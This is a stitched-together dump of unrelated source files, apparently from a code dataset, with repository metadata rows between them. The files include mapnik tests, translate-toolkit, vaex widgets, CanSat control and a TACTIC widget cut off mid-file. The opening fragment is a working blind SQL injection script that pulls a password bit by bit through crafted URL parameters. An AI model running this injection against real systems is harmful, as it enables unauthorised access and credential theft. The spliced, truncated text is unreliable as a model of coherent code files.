sys.stdout.flush()
data = ''
i = 1
# While we don't have the entire password
while True:
char = 0
for j in range(1,8):
# The injection performed here is URL-based
# To use another mean of injection (HTTP Headers, Cookies...)
# change the crafting between the hashtags
#### CHANGE HERE
if '?' in target_url:
separator = '&'
else:
separator = '?'
url = target_url + separator + "u=' OR " + \
"(select mid(lpad(bin(ord(mid({0},{1},1))),7,'0'),{2},1) " + \
"from {3} {4} " + \
"limit {5},1) = 1;-- &p=bla"
url = url.format(column, i, j, table, where, index)
r = requests.get(url)
#### END OF CHANGE
output = r.text
# We seek which half of authorized_characters
# we should search in
if string in output:
char += 2**(6 - j + 1)
if char != 0:
# When we find a character, we display it on stdout
print(chr(char), end='')
sys.stdout.flush()
# We add it to the existing data
data += chr(char)
i += 1
else:
break
print('\r[done]')
return data
| gpl-3.0 | 5,222,827,028,218,631,000 | 30.617284 | 82 | 0.570871 | false | 4.033071 | false | false | false |
h4ck3rm1k3/MapNickAutotools | tests/python_tests/load_map_test.py | 1 | 1395 | #!/usr/bin/env python
from nose.tools import *
from utilities import execution_path
import os, sys, glob, mapnik
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
# We expect these files to not raise any
# exceptions at all
def assert_loads_successfully(file):
m = mapnik.Map(512, 512)
strict = True
mapnik.load_map(m, file, strict)
# libxml2 is not smart about paths, and clips the last directory off
# of a path if it does not end in a trailing slash
base_path = os.path.dirname(file) + '/'
mapnik.load_map_from_string(m,open(file,'rb').read(),strict,base_path)
# We expect these files to raise a RuntimeError
# and fail if there isn't one (or a different type
# of exception)
@raises(RuntimeError)
def assert_raises_runtime_error(file):
m = mapnik.Map(512, 512)
strict = True
mapnik.load_map(m, file, strict)
def test_broken_files():
broken_files = glob.glob("../data/broken_maps/*.xml")
# Add a filename that doesn't exist
broken_files.append("../data/broken/does_not_exist.xml")
for file in broken_files:
yield assert_raises_runtime_error, file
def test_good_files():
good_files = glob.glob("../data/good_maps/*.xml")
for file in good_files:
yield assert_loads_successfully, file
| lgpl-2.1 | -6,521,023,405,738,516,000 | 26.9 | 74 | 0.676703 | false | 3.4875 | false | false | false |
rdio/translate-toolkit | tools/pocompile.py | 3 | 3220 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2005, 2006,2010 Zuza Software Foundation
#
# This file is part of the translate-toolkit
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with translate; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Compile XLIFF and Gettext PO localization files into Gettext MO (Machine Object) files
See: http://translate.sourceforge.net/wiki/toolkit/pocompile for examples and
usage instructions
"""
from translate.storage import factory
from translate.storage import mo
from translate.misc.multistring import multistring
def _do_msgidcomment(string):
return u"_: %s\n" % string
class POCompile:
def convertstore(self, inputfile, includefuzzy=False):
outputfile = mo.mofile()
for unit in inputfile.units:
if unit.istranslated() or (unit.isfuzzy() and includefuzzy and unit.target) or unit.isheader():
mounit = mo.mounit()
if unit.isheader():
mounit.source = ""
else:
mounit.source = unit.source
context = unit.getcontext()
if unit.msgidcomment:
if mounit.hasplural():
mounit.source = multistring(_do_msgidcomment(unit.msgidcomment) + mounit.source, *mounit.source.strings[1:])
else:
mounit.source = _do_msgidcomment(unit.msgidcomment) + mounit.source
elif context:
mounit.msgctxt = [context]
mounit.target = unit.target
outputfile.addunit(mounit)
return str(outputfile)
def convertmo(inputfile, outputfile, templatefile, includefuzzy=False):
"""reads in a base class derived inputfile, converts using pocompile, writes to outputfile"""
# note that templatefile is not used, but it is required by the converter...
inputstore = factory.getobject(inputfile)
if inputstore.isempty():
return 0
convertor = POCompile()
outputmo = convertor.convertstore(inputstore, includefuzzy)
# We have to make sure that we write the files in binary mode, therefore we
# reopen the file accordingly
outputfile.close()
outputfile = open(outputfile.name, 'wb')
outputfile.write(outputmo)
return 1
def main():
from translate.convert import convert
formats = {"po": ("mo", convertmo), "xlf": ("mo", convertmo)}
parser = convert.ConvertOptionParser(formats, usepots=False, description=__doc__)
parser.add_fuzzy_option()
parser.run()
if __name__ == '__main__':
main()
| gpl-2.0 | 2,589,526,101,237,635,000 | 36.44186 | 136 | 0.659938 | false | 4.154839 | false | false | false |
chengdh/openerp-ktv | openerp/addons/ktv_sale/ktv_helper.py | 1 | 5772 | # -*- coding: utf-8 -*-
from osv import fields
from datetime import date,datetime,time
import logging
_logger = logging.getLogger(__name__)
#时间段选择
def time_for_selection(self,cr,uid,context = None):
ret = [("%02i:00" % i,"%02i时30分" % i) for i in range(24)] + [("%02i:30" % i,"%02i时00分" % (i+1)) for i in range(24)]
ret.sort()
ret.pop()
ret.append(("23:59","23时59分"))
return ret
#价格列表
def price_list_for_selection(self,cr,uid,context = None):
ret =[("ting_price","大厅价"),("room_price","包厢价"),("member_price","会员价"),("vip_price","贵宾价"),("a_price","A类价"),("b_price","B类价")]
return ret
#房态定义
def room_states_for_selection(self,cr,uid,context = None):
ret =[("free","空闲"),("in_use","使用"),("scheduled","预定"),("locked","锁定"),("checkout","已结账"),("buyout","买断"),("buytime","买钟"),("malfunction","故障"),("clean","清洁"),("debug","调试"),("visit","带客")]
return ret
#男女
def sexes_for_select(self,cr,uid,context = None):
ret=[("F","女"),("M","男")]
return ret
#证件类型
def id_types_for_select(self,cr,uid,context = None):
ret=[(1,"身份证"),(2,"驾驶证"),(3,"其他证件")]
return ret
#根据0 1 2 3 4 5 6 分别返回星期缩写 min =0 ~ sun= 6
def weekday_str(weekday_int):
weekday_dict = {
0 : 'mon',
1 : 'tue',
2 : 'wed',
3 : 'thu',
4 : 'fri',
5 : 'sat',
6 : 'sun'
}
return weekday_dict[weekday_int]
def current_user_tz(obj,cr,uid,context = None):
"""
获取当前登录用户的时区设置
:param cursor cr 数据库游标
:params integer uid 当前登录用户id
"""
the_user = obj.pool.get('res.users').read(cr,uid,uid,['id','context_tz','name'])
return the_user['context_tz']
def user_context_now(obj,cr,uid):
"""
获取当前登录用户的本地日期时间
:return 本地化的当前日期
"""
tz = current_user_tz(obj,cr,uid)
context_now = fields.datetime.context_timestamp(cr,uid,datetime.now(),{"tz" : tz})
return context_now
def minutes_delta(time_from,time_to):
'''
计算给定两个时间的相差分钟数
:param time_from string 形式是'09:30'的字符串,指的是起始时间
:param time_to string 形式是'09:30'的字符串,指的是结束时间时间
:return integer 两个时间的相差分钟数
'''
array_time_from = [int(a) for a in time_from.split(':')]
array_time_to = [int(a) for a in time_to.split(':')]
t1 = time(array_time_from[0],array_time_from[1])
t2 = time(array_time_to[0],array_time_to[1])
return (t2.hour - t1.hour)*60 + (t2.minute - t1.minute)
def context_now_minutes_delta(obj,cr,uid,time_to):
'''
计算当前时间到给定时间的相差分钟数,该计算是以当期登录用户所在时区进行计算的
:param object obj osv对象
:param cursot cr 数据库游标
:param integer uid 当前登录用户
:param string time_to 当前时间
:return integer 两个时间的相差分钟数
'''
context_now = user_context_now(obj,cr,uid)
return minutes_delta(context_now.strftime("%H:%M"),time_to)
def context_strptime(osv_obj,cr,uid,str_time):
'''
将给定的时间字符串转变为当日的时间,以当前登录用户的时区为标准
:param osv_obj osv数据库对象
:param cr db cursor
:param int uid 当前登录用户
:param str_time 形式为'09:30'的时间字符串
:return datetime 计算过后的日期对象
'''
context_now = user_context_now(osv_obj,cr,uid)
time_array = [int(a) for a in str_time.split(":")]
ret = context_now.replace(hour=time_array[0],minute=time_array[1])
return ret
def str_to_today_time(time):
'''
将给定的字符串转换为当日的datetime
:params time 形式如 09:30:00形式的时间字符串
:return 日期为当日,时间为传入参数的datetime对象
'''
now = datetime.now()
array_time = [int(a) for a in time.split(':')]
ret = now.replace(hour=array_time[0],minute = array_time[1],second = array_time[2])
return ret
def utc_time_between(str_time_from,str_time_to,str_cur_time):
"""
判断给定的时间字符串是否在给定的时间区间内
由于对时间统一采用UTC时间保存,可能存在time_to < time_from的情况
:params string str_time_from 形式类似 09:10的时间字符串
:params string str_time_to 形式类似 09:10的时间字符串
:params str_cur_time 要比较的时间字符串
:return True 在范围内 else False
"""
if str_time_to > str_time_from:
return str_cur_time >= str_time_from and str_cur_time <= str_time_to
else:
#如果存在time_from 大于 time_to的情况,则说明时间跨天
return (str_cur_time >= str_time_from and str_cur_time < '23:59:59') or (str_cur_time >='00:00:00' and str_cur_time <= str_time_to)
def calculate_present_minutes(buy_minutes,promotion_buy_minutes = 0,promotion_present_minutes = 0):
"""
根据给定的参数计算赠送时长
买钟时间(分钟数) / 设定买钟时长(分钟数) * 赠送时长
:params buy_minutes integer 买钟时间
:params promotion_buy_minutes integer 买钟优惠设置中设定的买钟时长
:params promotion_present_minutes integer 买钟优惠设置中设定的赠送时长
:return integer 赠送时长
"""
#如果未设置优惠信息,则不赠送,直接返回买钟时间
if not promotion_buy_minutes:
return buy_minutes
present_minutes = buy_minutes / promotion_buy_minutes * promotion_present_minutes
return present_minutes
| agpl-3.0 | -5,257,962,662,141,587,000 | 31.951049 | 193 | 0.627547 | false | 2.164446 | false | false | false |
Arcturus314/cansat2017 | CanSat/control.py | 1 | 6550 | import datastore
import timed_input
import packet
import datalogger
import multiprocessing
import position
import time
start_data = False
input_timeout = 3 #3 seconds to wait for response
num_packets = 0
num_failures = 0
init_time = time.time()
print "init_time: ",
print init_time
in_packet = ("",False)
def t_input_actual(message):
global in_packet
in_data = ""
try:
in_data = str(timed_input.nonBlockingRawInput(message,input_timeout))
print "received: ",
print in_data
in_packet = in_data, True
return in_packet
except EOFError, err:
pass
return in_data
def t_input(message):
return ""
#packet takes form
#":,(id),|(message)|checksum"
#id:
# 0: custom data packet
# 1: change settings
# 2: request all current sensor data
# 3: request all env logging data
# 4: request all position tracking data
# 5: request all heat map data
# 6: request all stored heat map data
# 7: request all stored sensor data
# 8: request all error data
#message:
# 0: for id 2-7
# sensor_id,setting,value;...: for id 1
# sensor_id: 0 accel,1 mag,2 gyro,3, gsm
# setting: 0 power,1 update,2 full scale deflection
# value: 0 false, 1 true
# _,_,_,_,_,_,_;_,_,_,_,_,_,_;_;_;_;_: for custom packet- ind_data,inc_all_data,error,pos,mat,map
#checksum: see method
def parse_packet(packet):
global num_packets,num_failures
num_packets = num_packets + 1
try:
t_packet = packet.split(":")[1] #identifying packet by initial ':'
p_packet = t_packet.split("|") #splitting packet into header,body,and footer, separated by '|'
header = int(p_packet[0].split(",")[1]) #extracting identifier int from header
body = p_packet[1]
footer = int(p_packet[2])
return header,body,footer
except:
num_failures = num_failures+1
sms_malformed_packet()
return -1
def sms_malformed_packet(): #texts home in case of malformed packet
return None
def parse_body(header,body):
global num_packets
checksum_contribution = 0
try:
if header==0: #custom data packet
packet_settings = body.split(";")
inc_data = packet_settings[0]
inc_all_data = packet_settings[1]
inc_error = packet_settings[2]
inc_pos = packet_settings[3]
inc_mat = packet_settings[4]
inc_map = packet_settings[5]
packet.init_packet(inc_data,inc_all_data,inc_error,inc_pos,inc_mat,inc_map)
send_packet(packet.build_packet())
if header==1:
settings_list = body.split(";")
for setting in settings_list:
power = True
update = True
deflection = True
if setting[0] == 0: #accelerometer
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_accelerometer_settings(power, update, deflection)
if setting[0] == 1: #magnetometer
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_magnetometer_settings(power, update, deflection)
if setting[0] == 2: #gyroscope
if setting[1] == 0:
if setting[2] == 0:
power = False
if setting[1] == 1:
if setting[2] == 0:
update = False
if setting[1] == 2:
if setting[2] ==0:
deflection = False
datastore.set_gyroscope_settings(power, update, deflection)
if setting[0] == 3: #sim800l
if setting[1] == 0:
if setting[2] == 0:
power = False
return_read()
if header==2:
packet.init_packet_type(1)
send_packet(packet.build_packet())
if header==3:
packet.init_packet_type(2)
send_packet(packet.build_packet())
if header==4:
packet.init_packet_type(3)
send_packet(packet.build_packet())
if header==5:
packet.init_packet_type(4)
send_packet(packet.build_packet())
if header==6:
packet.init_packet_type(5)
send_packet(packet.build_packet())
if header==7:
packet.init_packet_type(6)
send_packet(packet.build_packet())
if header==8:
packet.init_packet_type(7)
send_packet(packet.build_packet())
return 1
except:
num_failures = num_failures+1
sms_malformed_packet()
return -1
def send_packet(packet):
print packet
def return_ready():
print "ready"
def overall_control():
global in_packet
while True:
#tall = time.time()
if in_packet[1] == False:
t_input("")
if in_packet[1] == True:
parsed_packet = parse_packet(in_packet[0])
if parsed_packet != -1:
#t = time.time()
build_packet(parsed_packet[0],parsed_packet[1])
#print "build packet time",
#print time.time()-t
send_packet(packet.build_packet())
#print "total time",
#print time.time()-tall
#Actual code execution
return_ready() #ready returned on startup
datastore.setTime(init_time)
position.setTime(init_time)
#Control process manages overall packetization / communicatio with the base station
#Logger process independently manages data logging and recording to files
if __name__ == '__main__':
control = multiprocessing.Process(target=overall_control)
logger = multiprocessing.Process(target=datalogger.add_all_inf)
control.start()
logger.start()
| gpl-3.0 | -2,134,036,573,260,997 | 31.914573 | 103 | 0.52687 | false | 3.969697 | false | false | false |
hidenori-t/chainer | cupy/carray.py | 9 | 1722 | import ctypes
import os
import six
from cupy import cuda
MAX_NDIM = 25
def _make_carray(n):
class CArray(ctypes.Structure):
_fields_ = (('data', ctypes.c_void_p),
('size', ctypes.c_int),
('shape', ctypes.c_int * n),
('strides', ctypes.c_int * n))
return CArray
_carrays = [_make_carray(i) for i in six.moves.range(MAX_NDIM)]
def to_carray(data, size, shape, strides):
return _carrays[len(shape)](data, size, shape, strides)
def _make_cindexer(n):
class CIndexer(ctypes.Structure):
_fields_ = (('size', ctypes.c_int),
('shape', ctypes.c_int * n),
('index', ctypes.c_int * n))
return CIndexer
_cindexers = [_make_cindexer(i) for i in six.moves.range(MAX_NDIM)]
def to_cindexer(size, shape):
return _cindexers[len(shape)](size, shape, (0,) * len(shape))
class Indexer(object):
def __init__(self, shape):
size = 1
for s in shape:
size *= s
self.shape = shape
self.size = size
@property
def ndim(self):
return len(self.shape)
@property
def ctypes(self):
return to_cindexer(self.size, self.shape)
_header_source = None
def _get_header_source():
global _header_source
if _header_source is None:
header_path = os.path.join(os.path.dirname(__file__), 'carray.cuh')
with open(header_path) as header_file:
_header_source = header_file.read()
return _header_source
def compile_with_cache(source, options=(), arch=None, cachd_dir=None):
source = _get_header_source() + source
return cuda.compile_with_cache(source, options, arch, cachd_dir)
| mit | -2,818,954,360,372,897,000 | 22.27027 | 75 | 0.585947 | false | 3.311538 | false | false | false |
maartenbreddels/vaex | packages/vaex-jupyter/vaex/jupyter/__init__.py | 1 | 10408 | # -*- coding: utf-8 -*-
import os
import logging
import time
from .utils import debounced, flush, gather, kernel_tick, interactive_selection, interactive_cleanup # noqa
import vaex
import IPython.display
base_path = os.path.dirname(__file__)
logger = logging.getLogger("vaex.jupyter")
def _add_toolbar(viz):
from .widgets import ToolsToolbar, tools_items_default
from traitlets import link
interact_items = [k for k in tools_items_default if k['value'] in viz.TOOLS_SUPPORTED]
toolbar = ToolsToolbar(supports_transforms=viz.supports_transforms,
supports_normalize=viz.supports_normalize,
interact_items=interact_items)
viz.children = [toolbar, ] + viz.children
link((viz, 'tool'), (toolbar, 'interact_value'))
link((viz, 'transform'), (toolbar, 'transform_value'))
link((viz, 'normalize'), (toolbar, 'normalize'))
link((viz, 'selection_mode'), (toolbar, 'selection_mode'))
return toolbar
class DataFrameAccessorWidget(object):
def __init__(self, df):
self.df = df
import vaex.jupyter.grid
self.grid = vaex.jupyter.model.GridCalculator(df, [])
self._last_grid = None
@debounced(delay_seconds=0.1, reentrant=False)
async def execute_debounced(self):
"""Schedules an execution of dataframe tasks in the near future (debounced)."""
try:
logger.debug("Execute tasks... tasks=%r", self.df.executor.tasks)
await self.df.execute_async()
logger.debug("Execute tasks done")
except vaex.execution.UserAbort:
pass # this is fine
except Exception:
logger.exception("Error while executing tasks")
def clear(self):
self.grid = vaex.jupyter.model.GridCalculator(self.df, [])
def data_array(self, axes=[], selection=None, shared=False, display_function=IPython.display.display, **kwargs):
'''Create a :func:`vaex.jupyter.model.DataArray` model and :func:`vaex.jupyter.view.DataArray` widget and links them.
This is a convenience method to create the model and view, and hook them up.
'''
import vaex.jupyter.model
import vaex.jupyter.view
if selection is not None:
selection = selection.copy()
model = vaex.jupyter.model.DataArray(df=self.df, axes=axes, selection=selection, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
view = vaex.jupyter.view.DataArray(model=model, display_function=display_function)
return view
def axis_model(self, expression, limits=None):
return self._axes([expression], limits=[limits])[0]
def _axes(self, expressions, limits):
limits = self.df.limits(expressions, limits)
axes = [vaex.jupyter.model.Axis(df=self.df, expression=expression, min=min, max=max) for expression, (min, max) in zip(expressions, limits)]
return axes
def histogram(self, x, limits=None, selection=None, selection_interact='default', toolbar=True, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
if selection is not None:
selection = selection.copy()
x, = self._axes([x], limits)
model = vaex.jupyter.model.Histogram(df=self.df, x=x, selection=selection, selection_interact=selection_interact, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
viz = vaex.jupyter.view.Histogram(model=model)
if toolbar:
viz.toolbar = _add_toolbar(viz)
return viz
def pie(self, x, limits=None, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
x, = self._axes([x], limits)
model = vaex.jupyter.model.Histogram(df=self.df, x=x, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
grid.model_add(model)
viz = vaex.jupyter.view.PieChart(model=model)
return viz
def heatmap(self, x, y, limits=None, selection=None, selection_interact='default', transform='log', toolbar=True, shape=256, shared=False, **kwargs):
import vaex.jupyter.model
import vaex.jupyter.view
x, y = self._axes([x, y], limits)
if selection is not None:
selection = selection.copy()
model = vaex.jupyter.model.Heatmap(df=self.df, x=x, y=y, selection=selection, shape=shape, **kwargs)
if shared:
grid = self.grid
else:
grid = vaex.jupyter.model.GridCalculator(self.df, [])
self._last_grid = grid
grid.model_add(model)
viz = vaex.jupyter.view.Heatmap(model=model, transform=transform)
if toolbar:
viz.toolbar = _add_toolbar(viz)
return viz
def expression(self, value=None, label='Custom expression'):
'''Create a widget to edit a vaex expression.
If value is an :py:`vaex.jupyter.model.Axis` object, its expression will be (bi-directionally) linked to the widget.
:param value: Valid expression (string or Expression object), or Axis
'''
from .widgets import ExpressionTextArea
import vaex.jupyter.model
if isinstance(value, vaex.jupyter.model.Axis):
expression_value = str(value.expression)
else:
expression_value = str(value) if value is not None else None
expression_widget = ExpressionTextArea(df=self.df, v_model=expression_value, label=label)
if isinstance(value, vaex.jupyter.model.Axis):
import traitlets
traitlets.link((value, 'expression'), (expression_widget, 'value'))
return expression_widget
def column(self, value=None, label='Choose a column'):
from .widgets import ColumnPicker
if isinstance(value, vaex.jupyter.model.Axis):
expression_value = str(value.expression)
else:
expression_value = str(value) if value is not None else None
column_widget = ColumnPicker(df=self.df, value=expression_value, label=label)
if isinstance(value, vaex.jupyter.model.Axis):
import traitlets
traitlets.link((value, 'expression'), (column_widget, 'value'))
return column_widget
def selection_expression(self, initial_value=None, name='default'):
from .widgets import ExpressionSelectionTextArea
if initial_value is None:
if not self.df.has_selection(name):
raise ValueError(f'No selection with name {name!r}')
else:
initial_value = self.df.get_selection(name).boolean_expression
return ExpressionSelectionTextArea(df=self.df, selection_name=name, v_model=str(initial_value) if initial_value is not None else None)
def progress_circular(self, width=10, size=70, color='#82B1FF', text='', auto_hide=False):
from .widgets import ProgressCircularNoAnimation
progress_circular = ProgressCircularNoAnimation(width=width, size=size, color=color, text=text, value=0)
@self.df.executor.signal_begin.connect
def progress_begin():
if auto_hide:
progress_circular.hidden = False
@self.df.executor.signal_progress.connect
def update_progress(value):
progress_circular.value = value*100
return True
@self.df.executor.signal_end.connect
def progress_update():
if auto_hide:
progress_circular.hidden = True
return progress_circular
def counter_processed(self, postfix="rows processed", update_interval=0.2):
from .widgets import Counter
counter_processed = Counter(value=0, postfix=postfix)
last_time = 0
@self.df.executor.signal_begin.connect
def progress_begin():
nonlocal last_time
last_time = time.time()
@self.df.executor.signal_progress.connect
def update_progress(value):
nonlocal last_time
number = int(value * len(self.df))
current_time = time.time()
if (current_time - last_time) > update_interval or value in [0, 1]:
counter_processed.value = number
last_time = current_time
return True
return counter_processed
def counter_selection(self, selection, postfix="rows selected", update_interval=0.2, lazy=False):
from .widgets import Counter
selected = self.df.count(selection=selection).item() if self.df.has_selection(name=selection) else 0
counter_selected = Counter(value=selected, postfix=postfix)
dirty = False
@self.df.signal_selection_changed.connect
def selection_changed(df, name):
nonlocal dirty
if name == selection:
# we only need to run once
if not dirty:
dirty = True
def update_value(value):
nonlocal dirty
dirty = False
try:
value = value.item()
except: # noqa
pass
counter_selected.value = value
# if lazy is True, this will only schedule the calculation, not yet execute it
if lazy:
vaex.delayed(update_value)(self.df.count(selection=selection, delay=True))
else:
update_value(self.df.count(selection=selection))
return counter_selected
# from .widgets import Tools
# from traitlets import link
# viz = [] if viz is None else viz
# viz = [viz] if not isinstance(viz, (tuple, list)) else viz
# tools = Tools(value=initial_value, children=[k.widget for k in viz])
# for v in viz:
# link((tools, 'value'), (v, 'tool'))
# return tools
# def card(plot, title=None, subtitle=None, **kwargs):
# from .widget import Card
# return Card(main=plot, title=title, subtitle,
def add_namespace():
pass
| mit | 7,665,222,285,347,056,000 | 40.466135 | 153 | 0.613855 | false | 3.966463 | false | false | false |
AlexanderPease/email-waze | app/user.py | 1 | 2998 | import app.basic, settings, ui_methods
import simplejson as json
import logging
import tornado.web
from mongoengine.queryset import Q, DoesNotExist, MultipleObjectsReturned
from db.userdb import User
from db.groupdb import Group
from db.profiledb import Profile
from group_api import AcceptInvite
########################
### Settings page for a user
### /user/settings
########################
class UserSettings(app.basic.BaseHandler):
@tornado.web.authenticated
def get(self):
# Find user by email
try:
user = User.objects.get(email=self.current_user)
except MultipleObjectsReturned:
raise tornado.web.HTTPError(500)
except DoesNotExist:
raise tornado.web.HTTPError(404)
# Display User's Groups
groups = user.get_groups()
group_invites_raw = Group.objects(Q(invited_emails=self.current_user) | Q(domain_setting__icontains=user.get_domain()))
group_invites = []
for g in group_invites_raw:
if g not in groups:
group_invites.append(g)
# User pays for groups larger than 5 people
paying_groups_raw = groups(admin=user)
paying_groups = []
for g in paying_groups_raw:
if len(g.users) > 5:
paying_groups.append(g)
# Possible message or error
msg = self.get_argument('msg', '')
err = self.get_argument('err', '')
return self.render('user/user_settings.html', user=user,
groups=groups,
group_invites=group_invites,
paying_groups=paying_groups,
msg=msg,
err=err,
list_to_comma_delimited_string=ui_methods.list_to_comma_delimited_string,
nav_select='settings',
nav_title='Settings for %s' % user.casual_name())
########################
### Welcome page for a new user
### /user/welcome
########################
class UserWelcome(app.basic.BaseHandler):
@tornado.web.authenticated
def get(self):
'''
user_welcome.html sends AJAX requests to group_api.py for user to
join groups he/she is invited to
'''
if self.user.welcomed and self.user.email not in settings.get('staff'):
return self.redirect('/')
else:
self.user.welcomed = True
self.user.save()
# Invited Groups. Display as joined, but join via AJAX by default
group_invites = self.user.groups_can_join()
group_invites = list(set(group_invites))
return self.render('user/user_welcome.html', # extends dashboard.html
user = self.user,
nav_title = True,
nav_select = 'dashboard',
groups = None,
group_invites = group_invites,
recent_contacts = None, # not enough time for this script to execute
today_reminders = None,
later_reminders = None) # new users never have any reminders
| gpl-3.0 | 7,409,164,365,114,897,000 | 31.586957 | 127 | 0.592728 | false | 3.965608 | false | false | false |
City-of-Bloomington/green-rental | scripts/migrate_data.py | 2 | 1731 | """
this is a script to help tranfer a data format
that was used initially to store downloaded geocoded coordinates
to the current one...
not a database migration script
note added *2014.03.01 20:07:37 ... script is older than that
"""
import os, json, codecs, re
from helpers import save_json, load_json, Location, Geo, save_results
def update_json(source, city_tag):
cache_file = "%s.json" % city_tag
cache_destination = os.path.join(os.path.dirname(source), cache_file)
local_cache = load_json(cache_destination, create=True)
assert local_cache.has_key('buildings')
assert local_cache.has_key('parcels')
locations = {}
for key, value in local_cache['buildings'].items():
location = Location(value)
for source in location.sources:
if hasattr(location, source):
result = getattr(location, source)
#convert from old dict format here
if isinstance(result, dict):
print "Found dictionary in: %s for: %s" % (source, location.address)
result = [ result ]
setattr(location, source, result)
locations[key] = location
#back it up for later
#enable this when downloading GPS coordinates...
#the rest of the time it slows things down
local_cache['buildings'] = {}
for key, value in locations.items():
local_cache['buildings'][key] = value.to_dict()
save_json(cache_destination, local_cache)
if __name__ == '__main__':
#main()
#update_json('/c/clients/green_rentals/cities/bloomington/data/Bloomington_rental.csv')
update_json('/c/clients/green_rentals/cities/ann_arbor/data/ann_arbor.json', "ann_arbor")
| agpl-3.0 | -8,462,015,992,887,935,000 | 33.62 | 93 | 0.642981 | false | 3.829646 | false | false | false |
darrencheng0817/AlgorithmLearning | Python/interview/levelSum.py | 1 | 1076 | '''
Created on 2015年12月4日
given [1, [2,3], [[4]]], return sum. 计算sum的方法是每向下一个level权重+1,
例子的sum = 1 * 1 + (2 + 3) * 2 + 4 * 3。follow up:每向下一个level 权重 - 1, sum = 3 * 1 +(2 + 3)* 2 + 4 * 1
@author: Darren
'''
def levelSum(string):
if not string:
return 0
index=0
level=0
maxLevel=0
d={}
while index<len(string):
char= string[index]
if char=="[":
level+=1
maxLevel=max(maxLevel,level)
index+=1
elif char.isdigit():
startIndex=index
while string[index].isdigit():
index+=1
num=int(string[startIndex:index])
if level not in d:
d[level]=[]
d[level].append(num)
elif char=="]":
level-=1
index+=1
else:
index+=1
res=0
for key,value in d.items():
for num in value:
res+=(maxLevel-key+1)*num
return res
print(levelSum("[1, [2,3], [2,3],[[4]]]") ) | mit | 2,215,303,086,633,905,700 | 23.707317 | 98 | 0.474308 | false | 3.057402 | false | false | false |
mwx1993/TACTIC | src/tactic/ui/checkin/sandbox_select_wdg.py | 6 | 6093 | ###########################################################
#
# Copyright (c) 2014, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['SandboxSelectWdg']
from pyasm.common import Environment, jsonloads, jsondumps, Config
from pyasm.biz import Project
from pyasm.web import DivWdg, Table, WidgetSettings
from tactic.ui.common import BaseRefreshWdg
from pyasm.widget import IconWdg, RadioWdg
from tactic.ui.widget import IconButtonWdg
from pyasm.search import Search, SearchType
class SandboxSelectWdg(BaseRefreshWdg):
def get_display(my):
top = my.top
top.add_class("spt_sandbox_select_top")
sandbox_options = [
{
'name': 'fast',
'base_dir': 'C:/Fast',
},
{
'name': 'faster',
'base_dir': 'C:/Faster',
},
{
'name': 'slow',
'base_dir': 'Z:/Slow',
}
]
process = my.kwargs.get("process")
search_key = my.kwargs.get("search_key")
sobject = Search.get_by_search_key(search_key)
search_type = sobject.get_base_search_type()
client_os = Environment.get_env_object().get_client_os()
if client_os == 'nt':
prefix = "win32"
else:
prefix = "linux"
alias_dict = Config.get_dict_value("checkin", "%s_sandbox_dir" % prefix)
search_key = sobject.get_search_key()
key = "sandbox_dir:%s" % search_key
from pyasm.web import WidgetSettings
value = WidgetSettings.get_value_by_key(key)
sandboxes_div = DivWdg()
top.add(sandboxes_div)
sandboxes_div.add_relay_behavior( {
'type': 'mouseenter',
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var last_background = bvr.src_el.getStyle("background-color");
bvr.src_el.setAttribute("spt_last_background", last_background);
bvr.src_el.setStyle("background-color", "#E0E0E0");
bvr.src_el.setStyle("opacity", "1.0");
'''
} )
sandboxes_div.add_relay_behavior( {
'type': 'mouseleave',
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var last_background = bvr.src_el.getAttribute("spt_last_background");
bvr.src_el.setStyle("background-color", last_background);
if (!bvr.src_el.hasClass("spt_selected")) {
bvr.src_el.setStyle("opacity", "0.5");
}
'''
} )
sandboxes_div.add_relay_behavior( {
'type': 'mouseup',
'key': key,
'bvr_match_class': 'spt_sandbox_option',
'cbjs_action': '''
var sandbox_dir = bvr.src_el.getAttribute("spt_sandbox_dir");
var server = TacticServerStub.get();
server.set_widget_setting(bvr.key, sandbox_dir);
var applet = spt.Applet.get();
applet.makedirs(sandbox_dir);
//var top = bvr.src_el.getParent(".spt_sandbox_select_top");
var top = bvr.src_el.getParent(".spt_checkin_top");
spt.panel.refresh(top);
'''
} )
#search = Search("config/naming")
#search.add_filter("search_type", search_type)
#search.add_filter("process", process)
#namings = search.get_sobjects()
#naming = namings[0]
from pyasm.biz import Snapshot, Naming
virtual_snapshot = Snapshot.create_new()
virtual_snapshot.set_value("process", process)
# for purposes of the sandbox folder for the checkin widget,
# the context is the process
virtual_snapshot.set_value("context", process)
naming = Naming.get(sobject, virtual_snapshot)
if naming:
naming_expr = naming.get_value("sandbox_dir_naming")
alias_options = naming.get_value("sandbox_dir_alias")
else:
naming_expr = None
alias_options = None
if alias_options == "__all__":
alias_options = alias_dict.keys()
elif alias_options:
alias_options = alias_options.split("|")
else:
alias_options = ['default']
for alias in alias_options:
from pyasm.biz import DirNaming
